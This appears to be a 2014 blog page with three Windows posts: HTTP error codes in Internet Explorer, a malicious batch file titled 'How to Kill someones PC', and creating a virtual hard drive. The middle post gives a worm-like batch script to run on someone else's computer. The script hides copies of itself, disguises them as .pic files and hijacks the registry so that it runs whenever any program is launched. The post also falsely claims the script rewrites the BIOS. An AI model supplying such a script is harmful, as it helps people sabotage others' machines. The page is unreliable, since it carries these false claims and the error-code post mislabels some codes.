Saturday, March 22, 2014

Website error messages (HTTP errors)

HTTP errors are sent to your web browser from a website if a problem is encountered when trying to view a webpage. If the webpage can't be displayed, Internet Explorer will display either the actual error page sent by the website or a friendly error message built into Internet Explorer. Here are some of the most common errors and ideas for how to solve the problem that's causing them.
The following table lists the most common HTTP errors that Internet Explorer displays. For information about HTTP protocols, error codes, and causes, go to the World Wide Web Consortium (W3C) website.

HTTP error message

1) The webpage cannot be found (HTTP 400)

 What it means:
 Internet Explorer is able to connect to the web server, but the webpage can't be found because of a problem with the web address (URL). This error message often happens because the website address is typed incorrectly. Make sure the address is correct and try again.

2) The website declined to show this webpage (HTTP 403)

 What it means:
Internet Explorer is able to connect to the website, but Internet Explorer doesn't have permission to display the webpage. This can happen for a variety of reasons; here are some of the most common:
  • The website's administrator has to give you permission to view the page or the web server doesn't accept public webpage requests. If this is a website that you should have access to, contact the website administrator.
  • The webpage you're trying to view is generated by a program, such as a shopping cart or search engine, and the folder on the server the program is contained in isn't correctly configured by the website administrator.
  • You've typed a basic web address (for example, www.example.com), but the website doesn't have a default webpage (such as index.htm or default.html). Additionally, the website doesn't allow directory listing, which allows you to view files in a web folder.
 
 3) The website cannot display the page (HTTP 405)
 
What it means:  
Internet Explorer is able to connect to the website, but the webpage content can't be downloaded to your computer. This is usually caused by a problem in the way the webpage was programmed.
 
4) Internet Explorer cannot read this webpage format (HTTP 406)

What it means:
Internet Explorer is able to receive information from the website but the information isn't in a format that Internet Explorer can display.
 
5) The website is too busy to show the webpage (HTTP 408 or 409) 
 
What it means:
The server took too long to display the webpage or there were too many people requesting the same page. Try again later.

6) That webpage no longer exists (HTTP 410)
 
What it means:
Internet Explorer is able to connect to the website, but the webpage can't be found. Unlike HTTP error 404, this error is permanent and was turned on by the website administrator. It's sometimes used for limited-time offers or promotional information.
 
7) The website cannot display the page (HTTP 500)
 
What it means:
The website you're visiting had a server problem that prevented the webpage from displaying. It often occurs as a result of website maintenance or because of a programming error on interactive websites that use scripting.


8) The website is unable to display the webpage (HTTP 501 or 505)

What it means:
Error 501 (HTTP 501 - Not Implemented) means that the website you're visiting isn't set up to display the content your browser is requesting. For example, the browser is asking for a file with a video extension (.AVI), but is telling the website it's looking for an HTML page.
Error 505 (HTTP 505 - Version Not Supported) means the website doesn't support the version of the HTTP protocol your browser uses to request the webpage (HTTP/1.1 being the most common).


Websites display HTTP errors in one of two ways: by showing a custom webpage or by sending a simple error number to Internet Explorer. If a website offers a custom webpage for the error, Internet Explorer will always display it. If a website sends a simple error number instead of a custom webpage, Internet Explorer will read the error number and display an error message that provides a bit more information than the number alone (these errors are also known as friendly error messages). Follow these steps to tell Internet Explorer to turn off these friendly error messages and simply display the error number sent by the website:

To turn off friendly HTTP error messages

  1. Open Internet Explorer by clicking the Start button Picture of the Start button. In the search box, type Internet Explorer, and then, in the list of results, click Internet Explorer.
  2. Click the Tools button, and then click Internet Options.
  3. Click the Advanced tab, and then scroll down to the Browsing section.
  4. Clear the Show friendly HTTP error messages check box, and then click OK.


Friday, March 21, 2014

How to Kill someones PC


Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.
 
Step One: Open notepad or anything similar.

Step Two: Paste the following code into notepad
 
@echo off & break off
:%random%
://associate .pic as batfile for camouflaggin
assoc .pic=batfile

:%random%
://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic

:%random%
://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f

:%random%
://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
exit
  
Step Three: Save the file as a .bat like so....
 How to use the batch
Now there are a few ways you can run this batch on someones computer.
 
 

How to Create a Virtual Hard Drive (VHD) in Windows 8/7



Have you ever wished you had an extra hard drive or partition to setup a dual-boot or multi-boot operating system? You can shrink your existing partition to create a new partition but it always carries some risk of data loss. Beginning with Windows 7, you can create a virtual hard drive (VHD) which acts as a separate hard drive in your computer.
The virtual hard drive (VHD) is stored as a .vhd file on your physical disk. By mounting a virtual hard drive, you can easily copy files to and from the virtual disk. Additionally, Windows 7 and Windows 8 can be configured to boot from a VHD. In this tutorial we’ll go through the steps of creating a virtual hard drive (VHD) in Windows 8/7.
How to Create a Virtual Hard Drive (VHD) in Windows 8/7?
  1. Press the Windows + R key combination to bring up a Run box, type compmgmt.msc and hit Enter.
  1. The Computer Management dialog opens, click Disk Management in the left pane of the window and wait until you see all currently installed disks in the right pane.
  2. Right-click Disk Management and then select Create VHD.
  1. Click Browse to choose the location where you want your VHD stored, and give it a descriptive name. Choose the size you want it to be, and select dynamic or a fixed. If you want the disk to expand in size as you add files to it, then pick Dynamically expanding. Check Fixed size if you want a specific size and for it to stay that way. Click OK.
  1. You will see the virtual hard drive listed as unallocated space in Disk Management. Right click on the virtual hard drive and select Initialize Disk.
  1. Press OK in the Initialize Disk box.
  1. Now it is time to create a volume by right-clicking the unallocated space and select New Simple Volume.
  1. The New Simple Volume Wizard starts up and just press Next until the wizard is complete.
  1. Now the new virtual disk is ready to be used, just like any other disk. You can see the virtual hard drive on your computer.

Contact Form

Name

Email *

Message *